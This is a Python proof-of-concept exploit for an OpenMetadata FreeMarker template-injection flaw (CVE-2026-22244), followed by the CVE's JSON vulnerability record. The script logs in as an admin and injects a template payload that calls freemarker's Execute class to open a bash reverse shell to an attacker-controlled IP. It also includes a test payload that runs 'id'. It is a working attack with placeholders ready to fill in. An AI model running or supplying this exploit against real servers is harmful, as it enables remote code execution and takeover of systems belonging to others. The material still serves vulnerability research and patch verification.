CVE-2026-22244

# CVE-2026-22244 OpenMetadata SSTI RCE PoC # Author: Security Research # Target: OpenMetadata < 1.11.4 # Requirement: Admin privileges import requests import json import sys TARGET_URL = "http://target:8585" # Change to target URL USERNAME = "admin" # Change to admin username PASSWORD = "admin" # Change to admin password ATTACKER_IP = "attacker_ip" # Change to attacker IP ATTACKER_PORT = "4444" # Change to listener port def login(): """Authenticate to OpenMetadata and get session token""" session = requests.Session() login_url = f"{TARGET_URL}/api/v1/users/login" data = { "username": USERNAME, "password": PASSWORD } headers = {"Content-Type": "application/json"} response = session.post(login_url, json=data, headers=headers, verify=False) if response.status_code == 200: return session, response.json().get("accessToken") else: print(f"[-] Login failed: {response.text}") sys.exit(1) def exploit_ssti(session, token): """Inject SSTI payload via email template configuration""" # Reverse shell payload for Linux payload = f'<#assign ex="freemarker.template.utility.Execute"?new()>${{ex("bash -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1")}}' # Alternative: Execute id command to verify RCE test_payload = '<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}' # Target endpoint for email template configuration template_url = f"{TARGET_URL}/api/v1/email/events" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Malicious template data exploit_data = { "name": "MaliciousTemplate", "description": test_payload, "template": payload } print(f"[*] Sending SSTI payload to {template_url}") response = session.post(template_url, json=exploit_data, headers=headers, verify=False) if response.status_code in [200, 201]: print("[+] SSTI payload sent successfully!") print(f"[*] Check your listener on {ATTACKER_IP}:{ATTACKER_PORT}") return True else: print(f"[-] Exploitation failed: {response.text}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2026-22244 OpenMetadata SSTI RCE Exploit") print("=" * 60) session, token = login() print("[+] Login successful!") exploit_ssti(session, token)

{"cve": {"id": "CVE-2026-22244", "sourceIdentifier": "[email protected]", "published": "2026-01-08T16:16:02.647", "lastModified": "2026-01-15T21:14:29.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenMetadata is a unified metadata platform. Versions prior to 1.11.4 are vulnerable to remote code execution via Server-Side Template Injection (SSTI) in FreeMarker email templates. An attacker must have administrative privileges to exploit the vulnerability. Version 1.11.4 contains a patch."}, {"lang": "es", "value": "OpenMetadata es una plataforma unificada de metadatos. Las versiones anteriores a la 1.11.4 son vulnerables a la ejecución remota de código a través de Inyección de Plantillas del Lado del Servidor (SSTI) en plantillas de correo electrónico de FreeMarker. Un atacante debe tener privilegios administrativos para explotar la vulnerabilidad. La versión 1.11.4 contiene un parche."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-metadata:openmetadata:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.11.4", "matchCriteriaId": "733E3727-E14A-4E3E-B2EE-538425CEFEB2"}]}]}], "references": [{"url": "https://github.com/open-metadata/OpenMetadata/commit/bffe7c45807763f9b682021d4211c478d2a08bb3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5f29-2333-h9c7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5f29-2333-h9c7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}